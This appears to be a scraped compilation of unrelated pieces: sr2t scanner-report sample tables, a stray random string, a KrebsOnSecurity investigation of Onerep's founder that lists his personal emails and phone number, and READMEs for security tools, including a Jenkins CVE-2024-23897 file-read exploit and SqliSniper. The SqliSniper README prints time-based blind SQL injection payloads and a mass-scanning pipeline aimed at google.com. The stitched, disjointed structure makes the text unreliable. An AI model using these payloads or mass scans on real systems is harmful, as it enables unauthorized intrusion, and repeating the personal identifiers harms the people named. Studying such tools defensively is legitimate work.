192.168.142.4,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X
192.168.142.4,3389,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.4,443,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.4,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X
192.168.142.4,3389,57582,SSL Self-Signed Certificate,2,X
192.168.142.4,3389,51192,SSL Certificate Cannot Be Trusted,2,X
192.168.142.2,3389,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.2,443,42873,SSL Medium Strength Cipher Suites Supported (SWEET32),2,X
192.168.142.2,3389,18405,Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness,2,X
192.168.142.2,3389,30218,Terminal Services Encryption Level is not FIPS-140 Compliant,1,X
192.168.142.2,3389,57690,Terminal Services Encryption Level is Medium or Low,2,X
192.168.142.2,3389,58453,Terminal Services Doesn't Use Network Level Authentication (NLA) Only,2,X
192.168.142.2,3389,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.2,443,45411,SSL Certificate with Wrong Hostname,2,X
192.168.142.2,3389,35291,SSL Certificate Signed Using Weak Hashing Algorithm,2,X
192.168.142.2,3389,57582,SSL Self-Signed Certificate,2,X
192.168.142.2,3389,51192,SSL Certificate Cannot Be Trusted,2,X
192.168.142.2,44 5,57608,SMB Signing not required,2,X
To produce an XLSX format:
$ sr2t --nmap example/nmap.xml -oX example.xlsx
To produce an text tabular format to stdout:
$ sr2t --nmap example/nmap.xml --nmap-services
Nmap TCP:
+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
| | 53 | 80 | 88 | 135 | 139 | 389 | 445 | 3389 | 5800 | 5900 |
+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
| 192.168.23.78 | X | | X | X | X | X | X | X | | |
| 192.168.27.243 | | | | X | X | | X | X | X | X |
| 192.168.99.164 | | | | X | X | | X | X | X | X |
| 192.168.228.211 | | X | | | | | | | | |
| 192.168.171.74 | | | | X | X | | X | X | X | X |
+-----------------+----+----+----+-----+-----+-----+-----+------+------+------+
Nmap Services:
+-----------------+------+-------+---------------+-------+
| ip address | port | proto | service | state |
+--------------- --+------+-------+---------------+-------+
| 192.168.23.78 | 53 | tcp | domain | open |
| 192.168.23.78 | 88 | tcp | kerberos-sec | open |
| 192.168.23.78 | 135 | tcp | msrpc | open |
| 192.168.23.78 | 139 | tcp | netbios-ssn | open |
| 192.168.23.78 | 389 | tcp | ldap | open |
| 192.168.23.78 | 445 | tcp | microsoft-ds | open |
| 192.168.23.78 | 3389 | tcp | ms-wbt-server | open |
| 192.168.27.243 | 135 | tcp | msrpc | open |
| 192.168.27.243 | 139 | tcp | netbios-ssn | open |
| 192.168.27.243 | 445 | tcp | microsoft-ds | open |
| 192.168.27.243 | 3389 | tcp | ms-wbt-server | open |
| 192.168.27.243 | 5800 | tcp | vnc-http | open |
| 192.168.27.243 | 5900 | tcp | vnc | open |
| 192.168.99.164 | 135 | tcp | msrpc | open |
| 192.168.99.164 | 139 | tcp | netbios-ssn | open |
| 192 .168.99.164 | 445 | tcp | microsoft-ds | open |
| 192.168.99.164 | 3389 | tcp | ms-wbt-server | open |
| 192.168.99.164 | 5800 | tcp | vnc-http | open |
| 192.168.99.164 | 5900 | tcp | vnc | open |
| 192.168.228.211 | 80 | tcp | http | open |
| 192.168.171.74 | 135 | tcp | msrpc | open |
| 192.168.171.74 | 139 | tcp | netbios-ssn | open |
| 192.168.171.74 | 445 | tcp | microsoft-ds | open |
| 192.168.171.74 | 3389 | tcp | ms-wbt-server | open |
| 192.168.171.74 | 5800 | tcp | vnc-http | open |
| 192.168.171.74 | 5900 | tcp | vnc | open |
+-----------------+------+-------+---------------+-------+
Or to output a CSV file:
$ sr2t --nmap example/nmap.xml -oC example
$ cat example_nmap_tcp.csv
ip address,53,80,88,135,139,389,445,3389,5800,5900
192.168.23.78,X,,X,X,X,X,X,X,,
192.168.27.243,,,,X,X,,X,X,X,X
192.168.99.164,,,,X,X,,X,X,X,X
192.168.228.211,,X,,,,,,,,
192.168.171.74,,,,X,X,,X,X,X,X
To produce an XLSX format:
$ sr2t --nikto example/nikto.xml -oX example/nikto.xlsx
To produce an text tabular format to stdout:
$ sr2t --nikto example/nikto.xml
+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
| target ip | target hostname | target port | description | annotations |
+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
| 192.168.178.10 | 192.168.178.10 | 80 | The anti-clickjacking X-Frame-Options header is not present. | X |
| 192.168.178.10 | 192.168.178.10 | 80 | The X-XSS-Protection header is not defined. This header can hint to the user | X |
| | | | agent to protect against some forms of XSS | |
| 192.168.178.10 | 192.168.178.10 | 8 0 | The X-Content-Type-Options header is not set. This could allow the user agent to | X |
| | | | render the content of the site in a different fashion to the MIME type | |
+----------------+-----------------+-------------+----------------------------------------------------------------------------------+-------------+
Or to output a CSV file:
$ sr2t --nikto example/nikto.xml -oC example
$ cat example_nikto.csv
target ip,target hostname,target port,description,annotations
192.168.178.10,192.168.178.10,80,The anti-clickjacking X-Frame-Options header is not present.,X
192.168.178.10,192.168.178.10,80,"The X-XSS-Protection header is not defined. This header can hint to the user
agent to protect against some forms of XSS",X
192.168.178.10,192.168.178.10,80,"The X-Content-Type-Options header is not set. This could allow the user agent to
render the content of the site in a different fashion to the MIME type",X
To produce an XLSX format:
$ sr2t --dirble example/dirble.xml -oX example.xlsx
To produce an text tabular format to stdout:
$ sr2t --dirble example/dirble.xml
+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+
| url | code | content len | is directory | is listable | found from listable | redirect url | annotations |
+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+
| http://example.org/flv | 0 | 0 | false | false | false | | X |
| http://example.org/hire | 0 | 0 | false | false | false | | X |
| http://example.org/phpSQLiteAdmin | 0 | 0 | false | false | false | | X |
| http://example.org/print_order | 0 | 0 | false | false | fa lse | | X |
| http://example.org/putty | 0 | 0 | false | false | false | | X |
| http://example.org/receipts | 0 | 0 | false | false | false | | X |
+-----------------------------------+------+-------------+--------------+-------------+---------------------+--------------+-------------+
Or to output a CSV file:
$ sr2t --dirble example/dirble.xml -oC example
$ cat example_dirble.csv
url,code,content len,is directory,is listable,found from listable,redirect url,annotations
http://example.org/flv,0,0,false,false,false,,X
http://example.org/hire,0,0,false,false,false,,X
http://example.org/phpSQLiteAdmin,0,0,false,false,false,,X
http://example.org/print_order,0,0,false,false,false,,X
http://example.org/putty,0,0,false,false,false,,X
http://example.org/receipts,0,0,false,false,false,,X
To produce an XLSX format:
$ sr2t --testssl example/testssl.json -oX example.xlsx
To produce an text tabular format to stdout:
$ sr2t --testssl example/testssl.json
+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
| ip address | port | BREACH | No HSTS | No PFS | No TLSv1.3 | RC4 | TLSv1.0 | TLSv1.1 | Wildcard |
+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
| rc4-md5.badssl.com/104.154.89.105 | 443 | X | X | X | X | X | X | X | X |
+-----------------------------------+------+--------+---------+--------+------------+-----+---------+---------+----------+
Or to output a CSV file:
$ sr2t --testssl example/testssl.json -oC example
$ cat example_testssl.csv
ip address,port,BREACH,No HSTS,No PFS,No TLSv1.3,RC4,TLSv1.0,TLSv1.1,Wildcard
rc4-md5.badssl.com/104.154.89.105,443,X,X,X,X,X,X,X,X
To produce an XLSX format:
$ sr2t --fortify example/fortify.fpr -oX example.xlsx
To produce an text tabular format to stdout:
$ sr2t --fortify example/fortify.fpr
+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+
| | type | subtype | severity | confidence | annotations |
+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+
| example1/web.xml:135:135 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
| example2/web.xml:150:150 | J2EE Misconfiguration | Insecure Transport | 3.0 | 5.0 | X |
| example3/web.xml:109:109 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |
| example4/web.xml:108:108 | J2EE Misconfiguration | Incomplete Error Handling | 3.0 | 5.0 | X |
| example5/web.xml:166:166 | J2EE Misconfiguration | Inse cure Transport | 3.0 | 5.0 | X |
| example6/web.xml:2:2 | J2EE Misconfiguration | Excessive Session Timeout | 3.0 | 5.0 | X |
| example7/web.xml:162:162 | J2EE Misconfiguration | Missing Authentication Method | 3.0 | 5.0 | X |
+--------------------------+-----------------------+-------------------------------+----------+------------+-------------+
Or to output a CSV file:
$ sr2t --fortify example/fortify.fpr -oC example
$ cat example_fortify.csv
,type,subtype,severity,confidence,annotations
example1/web.xml:135:135,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example2/web.xml:150:150,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example3/web.xml:109:109,J2EE Misconfiguration,Incomplete Error Handling,3.0,5.0,X
example4/web.xml:108:108,J2EE Misconfiguration,Incomplete Error Handling,3.0,5.0,X
example5/web.xml:166:166,J2EE Misconfiguration,Insecure Transport,3.0,5.0,X
example6/web.xml:2:2,J2EE Misconfiguration,Excessive Session Timeout,3.0,5.0,X
example7/web.xml:162:162,J2EE Misconfiguration,Missing Authentication Method,3.0,5.0,X
WW4L3VCX11zWgKPX51TRw2RENe8STkbCkh5wTV4GuQnbZ1fKYmPFobZhEfS1G9G3vwjBhzioi3vx8JgBx2xLxe4N1gtJee8Mp
The data privacy company Onerep.com bills itself as a Virginia-based service for helping people remove their personal information from almost 200 people-search websites. However, an investigation into the history of onerep.com finds this company is operating out of Belarus and Cyprus, and that its founder has launched dozens of people-search services over the years.
Onerepβs βProtectβ service starts at $8.33 per month for individuals and $15/mo for families, and promises to remove your personal information from nearly 200 people-search sites. Onerep also markets its service to companies seeking to offer their employees the ability to have their data continuously removed from people-search sites.
A testimonial on onerep.com.
Customer case studies published on onerep.com state that it struck a deal to offer the service to employees of Permanente Medicine, which represents the doctors within the health insurance giant Kaiser Permanente. Onerep also says it has made inroads among police departments in the United States.
But a review of Onerepβs domain registration records and that of its founder reveal a different side to this company. Onerep.com says its founder and CEO is Dimitri Shelest from Minsk, Belarus, as does Shelestβs profile on LinkedIn. Historic registration records indexed by DomainTools.com say Mr. Shelest was a registrant of onerep.com who used the email address dmitrcox2@gmail.com.
A search in the data breach tracking service Constella Intelligence for the name Dimitri Shelest brings up the email address dimitri.shelest@onerep.com. Constella also finds that Dimitri Shelest from Belarus used the email address d.sh@nuwber.com, and the Belarus phone number +375-292-702786.
Nuwber.com is a people search service whose employees all appear to be from Belarus, and it is one of dozens of people-search companies that Onerep claims to target with its data-removal service. Onerep.comβs website disavows any relationship to Nuwber.com, stating quite clearly, βPlease note that OneRep is not associated with Nuwber.com.β
However, there is an abundance of evidence suggesting Mr. Shelest is in fact the founder of Nuwber. Constella found that Minsk telephone number (375-292-702786) has been used multiple times in connection with the email address dmitrcox@gmail.com. Recall that Onerep.comβs domain registration records in 2018 list the email address dmitrcox2@gmail.com.
It appears Mr. Shelest sought to reinvent his online identity in 2015 by adding a β2β to his email address. The Belarus phone number tied to Nuwber.com shows up in the domain records for comversus.com, and DomainTools says this domain is tied to both dmitrcox@gmail.com and dmitrcox2@gmail.com. Other domains that mention both email addresses in their WHOIS records include careon.me, docvsdoc.com, dotcomsvdot.com, namevname.com, okanyway.com and tapanyapp.com.
Onerep.com CEO and founder Dimitri Shelest, as pictured on the βaboutβ page of onerep.com.
A search in DomainTools for the email address dmitrcox@gmail.com shows it is associated with the registration of at least 179 domain names, including dozens of mostly now-defunct people-search companies targeting citizens of Argentina, Brazil, Canada, Denmark, France, Germany, Hong Kong, Israel, Italy, Japan, Latvia and Mexico, among others.
Those include nuwber.fr, a site registered in 2016 which was identical to the homepage of Nuwber.com at the time. DomainTools shows the same email and Belarus phone number are in historic registration records for nuwber.at, nuwber.ch, and nuwber.dk (all domains linked here are to their cached copies at archive.org, where available).
Update, March 21, 11:15 a.m. ET: Mr. Shelest has provided a lengthy response to the findings in this story. In summary, Shelest acknowledged maintaining an ownership stake in Nuwber, but said there was βzero cross-over or information-sharing with OneRep.β Mr. Shelest said any other old domains that may be found and associated with his name are no longer being operated by him.
βI get it,β Shelest wrote. βMy affiliation with a people search business may look odd from the outside. In truth, if I hadnβt taken that initial path with a deep dive into how people search sites work, Onerep wouldnβt have the best tech and team in the space. Still, I now appreciate that we did not make this more clear in the past and Iβm aiming to do better in the future.β The full statement is available here (PDF).
Original story:
Historic WHOIS records for onerep.com show it was registered for many years to a resident of Sioux Falls, SD for a completely unrelated site. But around Sept. 2015 the domain switched from the registrar GoDaddy.com to eNom, and the registration records were hidden behind privacy protection services. DomainTools indicates around this time onerep.com started using domain name servers from DNS provider constellix.com. Likewise, Nuwber.com first appeared in late 2015, was also registered through eNom, and also started using constellix.com for DNS at nearly the same time.
Listed on LinkedIn as a former product manager at OneRep.com between 2015 and 2018 is Dimitri Bukuyazau, who says their hometown is Warsaw, Poland. While this LinkedIn profile (linkedin.com/in/dzmitrybukuyazau) does not mention Nuwber, a search on this name in Google turns up a 2017 blog post from privacyduck.com, which laid out a number of reasons to support a conclusion that OneRep and Nuwber.com were the same company.
βAny people search profiles containing your Personally Identifiable Information that were on Nuwber.com were also mirrored identically on OneRep.com, down to the relativesβ names and address histories,β Privacyduck.com wrote. The post continued:
βBoth sites offered the same immediate opt-out process. Both sites had the same generic contact and support structure. They were β and remain β the same company (even PissedConsumer.com advocates this fact: https://nuwber.pissedconsumer.com/nuwber-and-onerep-20160707878520.html).β
βThings changed in early 2016 when OneRep.com began offering privacy removal services right alongside their own open displays of your personal information. At this point when you found yourself on Nuwber.com OR OneRep.com, you would be provided with the option of opting-out your data on their site for free β but also be highly encouraged to pay them to remove it from a slew of other sites (and part of that payment was removing you from their own site, Nuwber.com, as a benefit of their service).β
Reached via LinkedIn, Mr. Bukuyazau declined to answer questions, such as whether he ever worked at Nuwber.com. However, Constella Intelligence finds two interesting email addresses for employees at nuwber.com: d.bu@nuwber.com, and d.bu+figure-eight.com@nuwber.com, which was registered under the name βDzmitry.β
PrivacyDuckβs claims about how onerep.com appeared and behaved in the early days are not readily verifiable because the domain onerep.com has been completely excluded from the Wayback Machine at archive.org. The Wayback Machine will honor such requests if they come directly from the owner of the domain in question.
Still, Mr. Shelestβs name, phone number and email also appear in the domain registration records for a truly dizzying number of country-specific people-search services, including pplcrwlr.in, pplcrwlr.fr, pplcrwlr.dk, pplcrwlr.jp, peeepl.br.com, peeepl.in, peeepl.it and peeepl.co.uk.
The same details appear in the WHOIS registration records for the now-defunct people-search sites waatpp.de, waatp1.fr, azersab.com, and ahavoila.com, a people-search service for French citizens.
A search on the email address dmitrcox@gmail.com suggests Mr. Shelest was previously involved in rather aggressive email marketing campaigns. In 2010, an anonymous source leaked to KrebsOnSecurity the financial and organizational records of Spamit, which at the time was easily the largest Russian-language pharmacy spam affiliate program in the world.
Spamit paid spammers a hefty commission every time someone bought male enhancement drugs from any of their spam-advertised websites. Mr. Shelestβs email address stood out because immediately after the Spamit database was leaked, KrebsOnSecurity searched all of the Spamit affiliate email addresses to determine if any of them corresponded to social media accounts at Facebook.com (at the time, Facebook allowed users to search profiles by email address).
That mapping, which was done mainly by generous graduate students at my alma mater George Mason University, revealed that dmitrcox@gmail.com was used by a Spamit affiliate, albeit not a very profitable one. That same Facebook profile for Mr. Shelest is still active, and it says he is married and living in Minsk [Update, Mar. 16: Mr. Shelestβs Facebook account is no longer active].
Scrolling down Mr. Shelestβs Facebook page to posts made more than ten years ago show him liking the Facebook profile pages for a large number of other people-search sites, including findita.com, findmedo.com, folkscan.com, huntize.com, ifindy.com, jupery.com, look2man.com, lookerun.com, manyp.com, peepull.com, perserch.com, persuer.com, pervent.com, piplenter.com, piplfind.com, piplscan.com, popopke.com, pplsorce.com, qimeo.com, scoutu2.com, search64.com, searchay.com, seekmi.com, selfabc.com, socsee.com, srching.com, toolooks.com, upearch.com, webmeek.com, and many country-code variations of viadin.ca (e.g. viadin.hk, viadin.com and viadin.de).
Domaintools.com finds that all of the domains mentioned in the last paragraph were registered to the email address dmitrcox@gmail.com.
Mr. Shelest has not responded to multiple requests for comment. KrebsOnSecurity also sought comment from onerep.com, which likewise has not responded to inquiries about its founderβs many apparent conflicts of interest. In any event, these practices would seem to contradict the goal Onerep has stated on its site: βWe believe that no one should compromise personal online security and get a profit from it.β
Max Anderson is chief growth officer at 360 Privacy, a legitimate privacy company that works to keep its clientsβ data off of more than 400 data broker and people-search sites. Anderson said it is concerning to see a direct link between between a data removal service and data broker websites.
βI would consider it unethical to run a company that sells peopleβs information, and then charge those same people to have their information removed,β Anderson said.
Last week, KrebsOnSecurity published an analysis of the people-search data broker giant Radaris, whose consumer profiles are deep enough to rival those of far more guarded data broker resources available to U.S. police departments and other law enforcement personnel.
That story revealed that the co-founders of Radaris are two native Russian brothers who operate multiple Russian-language dating services and affiliate programs. It also appears many of the Radaris foundersβ businesses have ties to a California marketing firm that works with a Russian state-run media conglomerate currently sanctioned by the U.S. government.
KrebsOnSecurity will continue investigating the history of various consumer data brokers and people-search providers. If any readers have inside knowledge of this industry or key players within it, please consider reaching out to krebsonsecurity at gmail.com.
Update, March 15, 11:35 a.m. ET: Many readers have pointed out something that was somehow overlooked amid all this research: The Mozilla Foundation, the company that runs the Firefox Web browser, has launched a data removal service called Mozilla Monitor that bundles OneRep. That notice says Mozilla Monitor is offered as a free or paid subscription service.
βThe free data breach notification service is a partnership with Have I Been Pwned (βHIBPβ),β the Mozilla Foundation explains. βThe automated data deletion service is a partnership with OneRep to remove personal information published on publicly available online directories and other aggregators of information about individuals (βData Broker Sitesβ).β
In a statement shared with KrebsOnSecurity.com, Mozilla said they did assess OneRepβs data removal service to confirm it acts according to privacy principles advocated at Mozilla.
βWe were aware of the past affiliations with the entities named in the article and were assured they had ended prior to our work together,β the statement reads. βWeβre now looking into this further. We will always put the privacy and security of our customers first and will provide updates as needed.β
In the dynamic realm of cybersecurity, vigilance and proactive defense are key. Malicious actors often leverage Microsoft Office files and Zip archives, embedding covert URLs or macros to initiate harmful actions. This Python script is crafted to detect potential threats by scrutinizing the contents of Microsoft Office documents, Acrobat Reader PDF documents and Zip files, reducing the risk of inadvertently triggering malicious code.
The script smartly identifies Microsoft Office documents (.docx, .xlsx, .pptx), Acrobat Reader PDF documents (.pdf) and Zip files. These file types, including Office documents, are zip archives that can be examined programmatically.
For both Office and Zip files, the script decompresses the contents into a temporary directory. It then scans these contents for URLs using regular expressions, searching for potential signs of compromise.
To minimize false positives, the script includes a list of domains to ignore, filtering out common URLs typically found in Office documents. This ensures focused analysis on unusual or potentially harmful URLs.
Files with URLs not on the ignored list are marked as suspicious. This heuristic method allows for adaptability based on your specific security context and threat landscape.
Post-scanning, the script cleans up by erasing temporary decompressed files, leaving no traces.
To effectively utilize the script:
Execute the script with the command: python CanaryTokenScanner.py FILE_OR_DIRECTORY_PATH
(Replace FILE_OR_DIRECTORY_PATH
with the actual file or directory path.)
Interpretation
An example of the Canary Token Scanner script in action, demonstrating its capability to detect suspicious URLs.
This script is intended for educational and security testing purposes only. Utilize it responsibly and in compliance with applicable laws and regulations.
Exploitation and scanning tool specifically designed for Jenkins versions <= 2.441 & <= LTS 2.426.2
. It leverages CVE-2024-23897
to assess and exploit vulnerabilities in Jenkins instances.
Ensure you have the necessary permissions to scan and exploit the target systems. Use this tool responsibly and ethically.
python CVE-2024-23897.py -t <target> -p <port> -f <file>
or
python CVE-2024-23897.py -i <input_file> -f <file>
Parameters: - -t
or --target
: Specify the target IP(s). Supports single IP, IP range, comma-separated list, or CIDR block. - -i
or --input-file
: Path to input file containing hosts in the format of http://1.2.3.4:8080/
(one per line). - -o
or --output-file
: Export results to file (optional). - -p
or --port
: Specify the port number. Default is 8080 (optional). - -f
or --file
: Specify the file to read on the target system.
-i INPUT_FILE
). -o OUTPUT_FILE
).Contributions are welcome. Please feel free to fork, modify, and make pull requests or report issues.
Alexander Hagenah - URL - Twitter
This tool is meant for educational and professional purposes only. Unauthorized scanning and exploiting of systems is illegal and unethical. Always ensure you have explicit permission to test and exploit any systems you target.
RepoReaper is a precision tool designed to automate the identification of exposed .git
repositories across a list of domains and subdomains. By processing a user-provided text file with domain names, RepoReaper systematically checks each for publicly accessible .git
files. This enables rapid assessment and protection against information leaks, making RepoReaper an essential resource for security teams and web developers.
.git
repositories.Clone the repository and install the required dependencies:
git clone https://github.com/YourUsername/RepoReaper.git
cd RepoReaper
pip install -r requirements.txt
chmod +x RepoReaper.py
RepoReaper is executed from the command line and will prompt for the path to a file containing a list of domains or subdomains to be scanned.
To start RepoReaper, simply run:
./RepoReaper.py
or
python3 RepoReaper.py
Upon execution, RepoReaper will ask for the path to the file containing the domains or subdomains: Enter the path of the file containing domains
Provide the path to your text file when prompted. The file should contain one domain or subdomain per line, like so:
example.com
subdomain.example.com
anotherdomain.com
RepoReaper will then proceed to scan the provided domains or subdomains for exposed .git repositories and report its findings.Β
This tool is intended for educational purposes and security research only. The user assumes all responsibility for any damages or misuse resulting from its use.
SploitScan is a powerful and user-friendly tool designed to streamline the process of identifying exploits for known vulnerabilities and their respective exploitation probability. Empowering cybersecurity professionals with the capability to swiftly identify and apply known and test exploits. It's particularly valuable for professionals seeking to enhance their security measures or develop robust detection strategies against emerging threats.
Regular:
python sploitscan.py CVE-YYYY-NNNNN
Enter one or more CVE IDs to fetch data. Separate multiple CVE IDs with spaces.
python sploitscan.py CVE-YYYY-NNNNN CVE-YYYY-NNNNN
Optional: Export the results to a JSON or CSV file. Specify the format: 'json' or 'csv'.
python sploitscan.py CVE-YYYY-NNNNN -e JSON
The Patching Prioritization System in SploitScan provides a strategic approach to prioritizing security patches based on the severity and exploitability of vulnerabilities. It's influenced by the model from CVE Prioritizer, with enhancements for handling publicly available exploits. Here's how it works:
This system assists users in making informed decisions on which vulnerabilities to patch first, considering both their potential impact and the likelihood of exploitation. Thresholds can be changed to your business needs.
Contributions are welcome. Please feel free to fork, modify, and make pull requests or report issues.
Alexander Hagenah - URL - Twitter
SwaggerSpy is a tool designed for automated Open Source Intelligence (OSINT) on SwaggerHub. This project aims to streamline the process of gathering intelligence from APIs documented on SwaggerHub, providing valuable insights for security researchers, developers, and IT professionals.
Swagger is an open-source framework that allows developers to design, build, document, and consume RESTful web services. It simplifies API development by providing a standard way to describe REST APIs using a JSON or YAML format. Swagger enables developers to create interactive documentation for their APIs, making it easier for both developers and non-developers to understand and use the API.
SwaggerHub is a collaborative platform for designing, building, and managing APIs using the Swagger framework. It offers a centralized repository for API documentation, version control, and collaboration among team members. SwaggerHub simplifies the API development lifecycle by providing a unified platform for API design and testing.
Performing OSINT on SwaggerHub is crucial because developers, in their pursuit of efficient API documentation and sharing, may inadvertently expose sensitive information. Here are key reasons why OSINT on SwaggerHub is valuable:
Developer Oversights: Developers might unintentionally include secrets, credentials, or sensitive information in API documentation on SwaggerHub. These oversights can lead to security vulnerabilities and unauthorized access if not identified and addressed promptly.
Security Best Practices: OSINT on SwaggerHub helps enforce security best practices. Identifying and rectifying potential security issues early in the development lifecycle is essential to ensure the confidentiality and integrity of APIs.
Preventing Data Leaks: By systematically scanning SwaggerHub for sensitive information, organizations can proactively prevent data leaks. This is especially crucial in today's interconnected digital landscape where APIs play a vital role in data exchange between services.
Risk Mitigation: Understanding that developers might forget to remove or obfuscate sensitive details in API documentation underscores the importance of continuous OSINT on SwaggerHub. This proactive approach mitigates the risk of unintentional exposure of critical information.
Compliance and Privacy: Many industries have stringent compliance requirements regarding the protection of sensitive data. OSINT on SwaggerHub ensures that APIs adhere to these regulations, promoting a culture of compliance and safeguarding user privacy.
Educational Opportunities: Identifying oversights in SwaggerHub documentation provides educational opportunities for developers. It encourages a security-conscious mindset, fostering a culture of awareness and responsible information handling.
By recognizing that developers can inadvertently expose secrets, OSINT on SwaggerHub becomes an integral part of the overall security strategy, safeguarding against potential threats and promoting a secure API ecosystem.
SwaggerSpy obtains information from SwaggerHub and utilizes regular expressions to inspect API documentation for sensitive information, such as secrets and credentials.
To use SwaggerSpy, follow these steps:
git clone https://github.com/UndeadSec/SwaggerSpy.git
cd SwaggerSpy
pip install -r requirements.txt
python swaggerspy.py searchterm
SwaggerSpy is intended for educational and research purposes only. Users are responsible for ensuring that their use of this tool complies with applicable laws and regulations.
Contributions to SwaggerSpy are welcome! Feel free to submit issues, feature requests, or pull requests to help improve this tool.
SwaggerSpy is developed and maintained by Alisson Moretto (UndeadSec)
I'm a passionate cyber threat intelligence pro who loves sharing insights and crafting cybersecurity tools.
SwaggerSpy is licensed under the MIT License. See the LICENSE file for details.
Special thanks to @Liodeus for providing project inspiration through swaggerHole.
AzSubEnum is a specialized subdomain enumeration tool tailored for Azure services. This tool is designed to meticulously search and identify subdomains associated with various Azure services. Through a combination of techniques and queries, AzSubEnum delves into the Azure domain structure, systematically probing and collecting subdomains related to a diverse range of Azure services.
AzSubEnum operates by leveraging DNS resolution techniques and systematic permutation methods to unveil subdomains associated with Azure services such as Azure App Services, Storage Accounts, Azure Databases (including MSSQL, Cosmos DB, and Redis), Key Vaults, CDN, Email, SharePoint, Azure Container Registry, and more. Its functionality extends to comprehensively scanning different Azure service domains to identify associated subdomains.
With this tool, users can conduct thorough subdomain enumeration within Azure environments, aiding security professionals, researchers, and administrators in gaining insights into the expansive landscape of Azure services and their corresponding subdomains.
During my learning journey on Azure AD exploitation, I discovered that the Azure subdomain tool, Invoke-EnumerateAzureSubDomains from NetSPI, was unable to run on my Debian PowerShell. Consequently, I created a crude implementation of that tool in Python.
β AzSubEnum git:(main) β python3 azsubenum.py --help
usage: azsubenum.py [-h] -b BASE [-v] [-t THREADS] [-p PERMUTATIONS]
Azure Subdomain Enumeration
options:
-h, --help show this help message and exit
-b BASE, --base BASE Base name to use
-v, --verbose Show verbose output
-t THREADS, --threads THREADS
Number of threads for concurrent execution
-p PERMUTATIONS, --permutations PERMUTATIONS
File containing permutations
Basic enumeration:
python3 azsubenum.py -b retailcorp --thread 10
Using permutation wordlists:
python3 azsubenum.py -b retailcorp --thread 10 --permutation permutations.txt
With verbose output:
python3 azsubenum.py -b retailcorp --thread 10 --permutation permutations.txt --verbose
SqliSniper is a robust Python tool designed to detect time-based blind SQL injections in HTTP request headers. It enhances the security assessment process by rapidly scanning and identifying potential vulnerabilities using multi-threaded, ensuring speed and efficiency. Unlike other scanners, SqliSniper is designed to eliminates false positives through and send alerts upon detection, with the built-in Discord notification functionality.
git clone https://github.com/danialhalo/SqliSniper.git
cd SqliSniper
chmod +x sqlisniper.py
pip3 install -r requirements.txt
This will display help for the tool. Here are all the options it supports.
ubuntu:~/sqlisniper$ ./sqlisniper.py -h
ββββββββ βββββββ βββ βββ ββββββββββββ βββββββββββββ βββββββββββββββ
ββββββββββββββββββββ βββ βββββββββββββ ββββββββββββββββββββββββββββββ
ββββββββββ ββββββ βββ ββββββββββββββ ββββββββββββββββββββ ββββββββ
βββββββββββββ ββββββ βββ ββββββββββββββββββββββββββββ ββββββ ββββββββ
βββββββββββ ββββββββββββββββ βββββββββββ ββββββββββββ βββββββββββ βββ
ββββββββ βββββββ βββββββββββ βββββββββββ βββββββββββ βββββββββββ βββ
-: By Muhammad Danial :-
usage: sqlisniper.py [-h] [-u URL] [-r URLS_FILE] [-p] [--proxy PROXY] [--payload PA YLOAD] [--single-payload SINGLE_PAYLOAD] [--discord DISCORD] [--headers HEADERS]
[--threads THREADS]
Detect SQL injection by sending malicious queries
options:
-h, --help show this help message and exit
-u URL, --url URL Single URL for the target
-r URLS_FILE, --urls_file URLS_FILE
File containing a list of URLs
-p, --pipeline Read from pipeline
--proxy PROXY Proxy for intercepting requests (e.g., http://127.0.0.1:8080)
--payload PAYLOAD File containing malicious payloads (default is payloads.txt)
--single-payload SINGLE_PAYLOAD
Single payload for testing
--discord DISCORD Discord Webhook URL
--headers HEADERS File containing headers (default is headers.txt)
--threads THREADS Number of threads
The url can be provided with -u flag
for single site scan
./sqlisniper.py -u http://example.com
The -r flag
allows SqliSniper to read a file containing multiple URLs for simultaneous scanning.
./sqlisniper.py -r url.txt
The SqliSniper can also worked with the pipeline input with -p flag
cat url.txt | ./sqlisniper.py -p
The pipeline feature facilitates seamless integration with other tools. For instance, you can utilize tools like subfinder and httpx, and then pipe their output to SqliSniper for mass scanning.
subfinder -silent -d google.com | sort -u | httpx -silent | ./sqlisniper.py -p
By default the SqliSniper use the payloads.txt file. However --payload flag
can be used for providing custom payloads file.
./sqlisniper.py -u http://example.com --payload mssql_payloads.txt
While using the custom payloads file, ensure that you substitute the sleep time with %__TIME_OUT__%
. SqliSniper dynamically adjusts the sleep time iteratively to mitigate potential false positives. The payloads file should look like this.
ubuntu:~/sqlisniper$ cat payloads.txt
0\"XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR\"Z
"0"XOR(if(now()=sysdate()%2Csleep(%__TIME_OUT__%)%2C0))XOR"Z"
0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z
If you want to only test with the single payload --single-payload flag
can be used. Make sure to replace the sleep time with %__TIME_OUT__%
./sqlisniper.py -r url.txt --single-payload "0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z"
Headers are saved in the file headers.txt for scanning custom header save the custom HTTP Request Header in headers.txt file.
ubuntu:~/sqlisniper$ cat headers.txt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
X-Forwarded-For: 127.0.0.1
SqliSniper also offers Discord alert notifications, enhancing its functionality by providing real-time alerts through Discord webhooks. This feature proves invaluable during large-scale scans, allowing prompt notifications upon detection.
./sqlisniper.py -r url.txt --discord <web_hookurl>
